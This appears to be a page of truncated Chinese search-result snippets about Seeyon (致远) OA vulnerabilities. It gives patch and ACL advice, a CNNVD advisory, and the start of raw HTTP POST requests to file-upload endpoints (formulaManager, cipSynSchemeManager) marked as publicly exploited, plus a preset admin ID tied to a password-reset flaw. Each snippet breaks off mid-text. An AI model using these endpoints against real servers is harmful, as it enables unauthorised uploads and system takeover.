1.登录官方网站(http://support.seeyon.com)获取补丁; 2.漏洞位置为:/seeyon/htmlofficeservlet,可以对该地址配置ACL规则。 临时修补方案如下: 1、 配置URL访问控制策略; 2、在公网部署的致远A8+服务器,通过ACL禁止外网对“/seeyon/htmlofficeservlet”路径...
## 致远OA_V8.1SP2文件上传漏洞 ``` POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1 Host: 1.1.1.1 User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64, rident/7.0; ry: 11.0) Accept: text/html, image/gif, image/ipeg, */*; q=.2...
致远OA任意文件上传漏洞 漏洞编号 无 影响产品 致远OA V8.0 致远OA V7.1、V7.1SP1 致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3 利用状态 在野利用(已公开poc) 漏洞详情 路径(需要普通用户权限) POST /seeyon/aiax.do?method=aiaxAction&managerName=cipSynSchemeManager&requestCompress=gzip HTTP/1.1 Host: 1.1....
近日,国家信息安全漏洞库(CNNVD)发布了关于致远OA远程代码执行漏洞(漏洞编号:CNNVD-201906-1049)的预警通报。致远是用友下属的子公司,从事OA办公自动化软件的开发销售与服务工作,致远OA是一款协同管理软件,在各中、大型企业机构中广泛使用。致远OA存在远...
致远OA-ucpcLogin密码重置漏洞 /** * 系统管理员预置ID * @deprecated 角色角色化后,废弃不再使用 */ public static final Long SYSTEM_ADMIN_ID = -7273032013234748168L; /** * 审计管理员预置ID * @deprecated 角色角色化后,废弃不再使用,8.1后可能删除 */ public static final Lo...